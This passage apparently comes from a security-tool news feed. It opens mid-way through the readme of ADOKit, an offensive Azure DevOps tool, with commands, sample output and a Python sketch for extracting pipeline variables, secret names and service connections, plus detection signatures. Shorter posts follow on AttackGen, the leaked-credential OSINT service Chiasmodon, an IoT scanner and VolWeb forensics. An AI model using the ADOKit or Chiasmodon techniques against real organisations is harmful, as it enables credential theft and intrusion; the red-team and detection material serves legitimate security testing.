[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith

4/5/23 15:21:44 Finished execution of removecollectionsvc

Get Pipeline Variables

Use Case

Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.

Syntax

Provide the getpipelinevars module along with the /project: argument for the project from which to extract pipeline variables. To extract pipeline variables from all projects, specify all in the /project: argument.

ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/6/2023 12:08:35 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Pipeline Var Name | Pipeline Var Value
-----------------------------------------------------------------------------------
credential | P@ssw0rd123!
url | http://blah/

4/6/23 16:08:36 Finished execution of getpipelinevars
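Under the hood this maps to ordinary Azure DevOps REST calls against the build definitions API. As a rough illustration (a sketch, not ADOKit's implementation; organisation, project, and PAT values are placeholders), pipeline variables can be read per build definition like so:

import base64
import requests

ORG, PROJECT, PAT = "YourOrganization", "maraudersmap", "apiKey"  # placeholders
headers = {"Authorization": "Basic " + base64.b64encode(f":{PAT}".encode()).decode()}
base = f"https://dev.azure.com/{ORG}/{PROJECT}/_apis/build/definitions"

# List the build definitions, then fetch each one in full to read its variables.
for d in requests.get(f"{base}?api-version=7.1", headers=headers).json()["value"]:
    detail = requests.get(f"{base}/{d['id']}?api-version=7.1", headers=headers).json()
    for name, var in (detail.get("variables") or {}).items():
        # Variables marked as secret come back without a value.
        print(name, var.get("value", "[HIDDEN]"))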

Get Pipeline Secrets

Use Case

Extract the names of any pipeline secrets being used in project(s), which tells the operator where to attempt secret extraction.

Syntax

Provide the getpipelinesecrets module along with the /project: argument for the project from which to extract the names of any pipeline secrets in use. To extract pipeline secret names from all projects, specify all in the /project: argument.

ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/10/2023 10:28:37 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]

4/10/23 14:28:38 Finished execution of getpipelinesecrets

Get Service Connections

Use Case

List any service connections being used in project(s), which tells the operator where credential extraction for those service connections can be attempted.

Syntax

Provide the getserviceconnections module along with the /project: argument for the project whose service connections should be listed. To list service connections across all projects, specify all in the /project: argument.

ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/11/2023 8:34:16 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

4/11/23 12:34:16 Finished execution of getserviceconnections
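The same data is reachable directly through the service endpoint REST API. A minimal sketch follows (placeholder organisation, project, and PAT; the api-version string may differ between Azure DevOps releases):

import base64
import requests

ORG, PROJECT, PAT = "YourOrganization", "maraudersmap", "apiKey"  # placeholders
headers = {"Authorization": "Basic " + base64.b64encode(f":{PAT}".encode()).decode()}
url = (f"https://dev.azure.com/{ORG}/{PROJECT}"
       "/_apis/serviceendpoint/endpoints?api-version=7.1-preview.4")

# Print name, type, and ID for each service connection in the project.
for ep in requests.get(url, headers=headers).json().get("value", []):
    print(ep.get("name"), "|", ep.get("type"), "|", ep.get("id"))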

Detection

Below are static signatures for the specific usage of this tool in its default state:

  • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
  • See ADOKit Yara Rule in this repo.
  • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
  • See ADOKit Snort Rule in this repo.
  • Microsoft Sentinel Rules
  • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
  • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.
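Because the user agent string above is static in the tool's default state, even a trivial log sweep can surface default-configuration ADOKit usage. A hypothetical example (the log path and format are assumptions; adapt to your proxy or web server logs):

# Illustrative only: flag the static ADOKit user agent in a proxy log.
UA = "ADOKit-21e233d4334f9703d1a3a42b6e2efd38"

with open("proxy.log", encoding="utf-8", errors="replace") as fh:  # assumed log file
    for lineno, line in enumerate(fh, 1):
        if UA in line:
            print(f"possible ADOKit activity, line {lineno}: {line.rstrip()}")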

Roadmap

  • Support for Azure DevOps Server

References

  • https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
  • https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops


Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

By: Zion3R


AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


Star the Repo

If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

Features

  • Generates unique incident response scenarios based on chosen threat actor groups.
  • Allows you to specify your organisation's size and industry for a tailored scenario.
  • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
  • Create custom scenarios based on a selection of ATT&CK techniques.
  • Capture user feedback on the quality of the generated scenarios.
  • Downloadable scenarios in Markdown format.
  • 🆕 Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
  • Available as a Docker container image for easy deployment.
  • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


Releases

v0.4 (current)

What's new? Why is it useful?

  • Mistral API Integration (Alternative Model Provider): Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
  • Local Model Support using Ollama (Local Model Hosting): AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app.
  • Optional LangSmith Integration (Improved Flexibility): The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
  • Various Bug Fixes and Improvements (Enhanced User Experience): This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

v0.3

What's new? Why is it useful?

  • Azure OpenAI Service Integration (Enhanced Integration): Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.
    • Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organisations that handle sensitive data in their threat models.
  • LangSmith for Azure OpenAI Service (Enhanced Debugging): LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.
    • User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
  • Model Selection for OpenAI API (Flexible Model Options): Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customisation and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
  • Docker Container Image (Easy Deployment): AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

v0.2

What's new? Why is it useful?

  • Custom Scenarios based on ATT&CK Techniques (For Mature Organisations): This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.
    • Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
  • User feedback on generated scenarios: Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
  • Improved error handling for missing API keys: Improved user experience.
  • Replaced Streamlit st.spinner widgets with the new st.status widget: Provides better visibility into long-running processes (i.e. scenario generation).

v0.1

Initial release.

Requirements

  • Recent version of Python.
  • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
  • OpenAI API key.
  • LangChain API key (optional) - see LangSmith Setup section below for further details.
  • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

Installation

Option 1: Cloning the Repository

  1. Clone this repository:
git clone https://github.com/mrwadams/attackgen.git
  2. Change directory into the cloned repository:
cd attackgen
  3. Install the required Python packages:
pip install -r requirements.txt

Option 2: Using Docker

  1. Pull the Docker container image from Docker Hub:
docker pull mrwadams/attackgen

LangSmith Setup

If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.
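For reference, a minimal .streamlit/secrets.toml that skips LangSmith can contain just the single field below (the field name comes from the note above; the empty value simply means runs won't be logged):

LANGCHAIN_API_KEY = ""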

Data Setup

Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Make sure to place this file in the ./data/ directory within the repository.
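If you prefer to script the download, something like the following works (the URL points at the MITRE CTI GitHub mirror and is an assumption; verify it matches the dataset version the app expects, and that the ./data/ directory exists):

import requests

# Assumed source: the MITRE CTI repository's enterprise-attack bundle.
URL = ("https://raw.githubusercontent.com/mitre/cti/master/"
       "enterprise-attack/enterprise-attack.json")

with open("./data/enterprise-attack.json", "wb") as fh:
    fh.write(requests.get(URL, timeout=120).content)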

Running AttackGen

After the data setup, you can run AttackGen with the following command:

streamlit run 👋_Welcome.py

You can also try the app on Streamlit Community Cloud.

Usage

Running AttackGen

Option 1: Running the Streamlit App Locally

  1. Run the Streamlit app:
streamlit run 👋_Welcome.py
  2. Open your web browser and navigate to the URL provided by Streamlit.
  3. Use the app to generate standard or custom incident response scenarios (see below for details).

Option 2: Using the Docker Container Image

  1. Run the Docker container:
docker run -p 8501:8501 mrwadams/attackgen

This command will start the container and map port 8501 (the default port for Streamlit apps) from the container to your host machine.
  2. Open your web browser and navigate to http://localhost:8501.
  3. Use the app to generate standard or custom incident response scenarios (see below for details).

Generating Scenarios

Standard Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisation's industry and size from the dropdown menus.
  4. Navigate to the Threat Group Scenarios page.
  5. Select the Threat Actor Group that you want to simulate.
  6. Click on 'Generate Scenario' to create the incident response scenario.
  7. Use the 👍 or 👎 buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Custom Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisation's industry and size from the dropdown menus.
  4. Navigate to the Custom Scenario page.
  5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
  6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
  7. Use the 👍 or 👎 buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

Contributing

I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

Licence

This project is licensed under GNU GPLv3.



Chiasmodon - An OSINT Tool Designed To Assist In The Process Of Gathering Information About A Target Domain

By: Zion3R


Chiasmodon is an OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about a target domain. Its primary functionality revolves around searching for domain-related data, including domain emails, domain credentials (usernames and passwords), CIDRs (Classless Inter-Domain Routing), ASNs (Autonomous System Numbers), and subdomains. The tool allows users to search by domain, CIDR, ASN, email, username, password, or Google Play application ID.


✨ Features

  • [x] ๐ŸŒDomain: Conduct targeted searches by specifying a domain name to gather relevant information related to the domain.
  • [x] ๐ŸŽฎGoogle Play Application: Search for information related to a specific application on the Google Play Store by providing the application ID.
  • [x] ๐Ÿ”ŽCIDR and ๐Ÿ”ขASN: Explore CIDR blocks and Autonomous System Numbers (ASNs) associated with the target domain to gain insights into network infrastructure and potential vulnerabilities.
  • [x] โœ‰๏ธEmail, ๐Ÿ‘คUsername, ๐Ÿ”’Password: Conduct searches based on email, username, or password to identify potential security risks or compromised credentials.
  • [x] ๐Ÿ“‹Output Customization: Choose the desired output format (text, JSON, or CSV) and specify the filename to save the search results.
  • [x] โš™๏ธAdditional Options: The tool offers various additional options, such as viewing different result types (credentials, URLs, subdomains, emails, passwords, usernames, or applications), setting API tokens, specifying timeouts, limiting results, and more.

🚀 Coming soon

  • 📱 Phone: Get ready to uncover even more valuable data by searching for information associated with phone numbers. Whether you're investigating a particular individual or looking for connections between phone numbers and other entities, this new feature will provide you with valuable insights.

  • 🏢 Company Name: We understand the importance of comprehensive company research. In our upcoming release, you'll be able to search by company name and access a wide range of documents associated with that company. This feature will provide you with a convenient and efficient way to gather crucial information, such as legal documents, financial reports, and other relevant records.

  • 👤 Face (Photo): Visual data is a powerful tool, and we are excited to introduce our advanced facial recognition feature. With "Search by Face (Photo)," you can upload an image containing a face and leverage cutting-edge technology to identify and match individuals across various data sources. This will allow you to gather valuable information, such as social media profiles, online presence, and potential connections, all through the power of facial recognition.

Why the name Chiasmodon?

Chiasmodon niger is a species of deep-sea fish in the family Chiasmodontidae. It is known for its ability to swallow fish larger than itself, and so do we. 😉


🔑 Subscription

Join us today and unlock the potential of our cutting-edge OSINT tool. Contact https://t.me/Chiasmod0n on Telegram to subscribe and start harnessing the power of Chiasmodon for your domain investigations.

โฌ‡๏ธInstall

pip install chiasmodon

💻 Usage

Chiasmodon provides a flexible and user-friendly command-line interface and python library. Here are some examples to demonstrate its usage:

How to use pychiasmodon library:

from pychiasmodon import Chiasmodon as ch 
token = "PUT_HERE_YOUR_API_KEY"
obj = ch(token)
  • Searching for a target domain and its subdomains:

    • Command line:
      chiasmodon_cli.py --domain example.com --all
    • Python:
      result = obj.search('example.com', method='domain', all=True)
      for i in result:
          print(i)

  • Searching for a target domain, you will see the result for only this "example.com":

    • Command line:
      chiasmodon_cli.py --domain example.com
    • Python:
      result = obj.search('example.com', method='domain')
      for i in result:
          print(i)

  • Searching for a target application ID on the Google Play Store:

    • Command line:
      chiasmodon_cli.py --app com.discord
    • Python:
      result = obj.search('com.discord', method='app')
      for i in result:
          print(i)

  • Searching for a target ASN:

    • Command line:
      chiasmodon_cli.py --asn AS123 --view-type cred
    • Python:
      result = obj.search('AS123', method='asn', view_type='cred')
      for i in result:
          print(i)

  • Searching for a target username:

    • Command line:
      chiasmodon_cli.py --username someone
    • Python:
      result = obj.search('someone', method='username')
      for i in result:
          print(i)

  • Searching for a target password:

    • Command line:
      chiasmodon_cli.py --password example@123
    • Python:
      result = obj.search('example@123', method='password')
      for i in result:
          print(i)

  • Searching for a target CIDR:

    • Command line:
      chiasmodon_cli.py --cidr x.x.x.x/24
    • Python:
      result = obj.search('x.x.x.x/24', method='cidr')
      for i in result:
          print(i)

  • Searching for target credentials by domain emails:

    • Command line:
      chiasmodon_cli.py --domain example.com --domain-emails
    • Python:
      result = obj.search('example.com', method='domain', only_domain_emails=True)
      for i in result:
          print(i)

  • All methods and view types:

    Methods                                                          | View Type
    -----------------------------------------------------------------+----------------------
    --domain, --email, --cidr, --app, --asn, --username, --password  | --view-type cred
    --cidr, --asn, --email, --username, --password                   | --view-type app
    --domain, --email, --cidr, --asn, --username, --password         | --view-type url
    --domain                                                         | --view-type subdomain
    --domain, --cidr, --asn, --app                                   | --view-type email
    --domain, --cidr, --app, --asn, --email, --password              | --view-type username
    --domain, --cidr, --app, --asn, --email, --username              | --view-type password
Please note that these examples represent only a fraction of the available options and use cases. Refer to the documentation for more detailed instructions and explore the full range of features provided by Chiasmodon.
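Putting the library calls from the examples above together, a small end-to-end sketch might look like this (the JSON file handling is illustrative and not part of the pychiasmodon API; adjust the string conversion to the result structure you actually receive):

import json
from pychiasmodon import Chiasmodon as ch

obj = ch("PUT_HERE_YOUR_API_KEY")

# Collect subdomains for a target and save them to a JSON file.
subdomains = [str(r) for r in obj.search('example.com', method='domain', view_type='subdomain')]
with open('subdomains.json', 'w') as fh:
    json.dump(subdomains, fh, indent=2)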

💬 Contributions and Feedback

Contributions and feedback are welcome! If you encounter any issues or have suggestions for improvements, please submit them to the Chiasmodon GitHub repository. Your input will help us enhance the tool and make it more effective for the OSINT community.

📜 License

Chiasmodon is released under the MIT License. See the LICENSE file for more details.

โš ๏ธDisclaimer

Chiasmodon is intended for legal and authorized use only. Users are responsible for ensuring compliance with applicable laws and regulations when using the tool. The developers of Chiasmodon disclaim any responsibility for the misuse or illegal use of the tool.

📢 Acknowledgments

Chiasmodon is the result of collaborative efforts from a dedicated team of contributors who believe in the power of OSINT. We would like to express our gratitude to the open-source community for their valuable contributions and support.



ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices

By: Zion3R


ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


~ Hilali Abdel

USAGE

python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

[Add new Device]

python3 smartthings.py -a 192.168.1.1

python3 smartthings.py -s --type TPLINK

python3 smartthings.py -s --firmware TP-Link Archer C7v2

Search for CVEs and PoCs [firmware and device type]


Scan device for open upnp ports

python3 smartthings.py -s --scan upnp --id

Get data from MQTT (subscribe)

python3 smartthings.py -s --scan mqtt --id
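For context, the MQTT scan above boils down to subscribing to the target device's broker and reading whatever it publishes. A rough equivalent with the paho-mqtt Python library (the broker address and the wildcard topic filter are assumptions, not tool internals) is:

import paho.mqtt.client as mqtt

def on_message(client, userdata, msg):
    # Print each message the broker delivers (payload truncated for readability).
    print(msg.topic, msg.payload[:200])

client = mqtt.Client()  # paho-mqtt 1.x style; 2.x requires mqtt.CallbackAPIVersion as first arg
client.on_message = on_message
client.connect("192.168.1.1", 1883, 60)  # assumed broker address and default port
client.subscribe("#")  # wildcard filter: every topic on the broker
client.loop_forever()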



VolWeb - A Centralized And Enhanced Memory Analysis Platform

By: Zion3R


VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.


Objective

The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.

By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.

Project Documentation and Getting Started Guide

The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.

[!IMPORTANT] Take time to read the documentation in order to avoid common misconfiguration issues.

Interacting with the REST API

VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository offering scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts. Check the wiki of the project to learn more about the possible API calls.

Issues

If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.

Contact

Contact me at k1nd0ne@mail.com for any questions regarding this tool.

Next Release Goals

Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1



โŒ